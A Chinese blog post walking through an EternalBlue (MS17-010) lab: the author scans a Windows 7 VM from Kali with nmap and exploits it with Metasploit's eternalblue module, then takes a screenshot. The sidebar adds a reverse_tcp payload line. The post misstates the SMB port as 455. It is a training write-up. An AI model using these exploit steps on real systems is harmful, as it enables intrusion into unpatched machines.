渗透测试-ms17-010演练

已于 2023-10-15 00:23:38 修改
阅读量111 收藏
点赞数
文章标签: 安全 web安全
于 2023-10-14 14:20:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57659259/article/details/133824124
版权

一.渗透测试流程

渗透测试一般分为以下几步

        1.前期交互阶段

        2.情报收集阶段

        3.危险建模阶段

        4.漏洞分析阶段

        5.渗透攻击阶段

        6.后渗透攻击阶段(清除痕迹)

        7.报告阶段

二.使用nmap进行扫描

        攻击机 kali

        靶机:wind7

        wind7 使用wind + r  输入 cmd  调出小黑窗

        输入 ipconfig  查看 wind7 的 ip

        

kali 输入 sudo su 进入root用户

再输入 nmap 目标ip 进行扫描

此时知道455端口是开放的,并且wind 7有个漏洞永恒之蓝

命令 msfconsole  打开msf的渗透攻击

搜索命令 search ms17-010  

use auxiliary/scanner/smb/smb_ms17_010  进行扫描

show optiosn  查看配置项

set rhosts 目标ip  设置扫描目标

run 执行

再输入 use exploit/windows/smb/ms17_010_eternalblue 进行攻击模块

 set rhosts 目标ip 设置目标

run  攻击执行

攻击成功

命令 screenshot  电脑截图

在文件夹中找到

一天一bug
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP版本MS17-010检测小脚本
weixin_33862188的博客
12-28 126
内网渗透的时候有点用处,可以检测MS17-010漏洞并获取操作系统信息,配合BURP可批量检测,纯socket发包,无需其他扩展。 <?php //根据巡风python代码翻译成PHP代码 //2017.08.03 by ice && By T00ls.Net; @error_reporting(7); if(@$_GET['host']){ ...
渗透测试实战-漏洞利用MS17-010
09-26 444
渗透测试实战-漏洞利用MS17-010
ms17-010(永恒之蓝) 漏洞复现与处理
最新发布
2401_84972648的博客
05-17 747
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1651
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3443
永恒之蓝
ms17-010.7z
01-28
标题“ms17-010.7z”和描述中的“国赛乱杀脚本”涉及的是一个网络安全领域的著名漏洞利用工具,该工具通常用于教育和竞赛环境,以模拟真实世界的网络安全攻击。这里提到的“ms17-010”是微软Windows操作系统的一个...
渗透测试工具-Cobalt Strike
03-21
**Cobalt Strike:渗透测试的强大武器** Cobalt Strike(简称CS)是一款广泛应用于网络安全领域的高级渗透测试工具,主要用于模拟攻击者的行为,帮助安全专业人员检测和评估组织的防御能力。这款工具以其强大的功能...
常见的渗透测试演练系统.pdf
03-04
要想学渗透测试又没好的靶场?刚出的漏洞想研究研究苦于没有目标?想练习OWASP10风险没有靶场?下面小编就给各位介绍常见的渗透测试演练系统。
网络攻防之-针对ms17-010脚本(python)
12-23
网络攻防之—针对ms17-010脚本(python) 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局...
渗透测试工具-weblogic\shiro
10-17
渗透测试是一种安全评估方法,主要用于发现并修复网络和应用程序中的潜在漏洞。在IT行业中,WebLogic和Apache Shiro是两个非常关键的组件,而“渗透测试工具-weblogic\shiro”可能指的是针对这两个组件的专用工具...
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
永恒之蓝检测工具MS17-010漏洞扫描工具
ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1780
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
ms17_010(永恒之蓝)漏洞复现详细教程
zxcvbnmasdflzl的博客
06-25 576
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块(强大到想流泪的功能模块))。首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意思)。
MS17-010永恒之蓝漏洞复现
weixin_65224093的博客
04-04 244
1、概述:永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
Windows下的MS17-010(永恒之蓝)漏洞分析与复现
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
kali (永恒之蓝MS17_010)漏洞复现
菜菜的博客
05-25 2059
8步完成get shell,需要的机子:渗透机(Linux(kali)一台),靶机(server 2008一台),简单的配置,就可以开始攻击了
Kali Linux与BackTrack渗透测试实战指南
6. 实战演练:书中包含的实操部分可以帮助你将理论知识转化为实践经验,加深对渗透测试流程的理解。 7. 工具应用:详尽地介绍了BackTrack中涉及的主要工具,以及如何在Kali Linux中找到这些工具的替代品。 此外,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值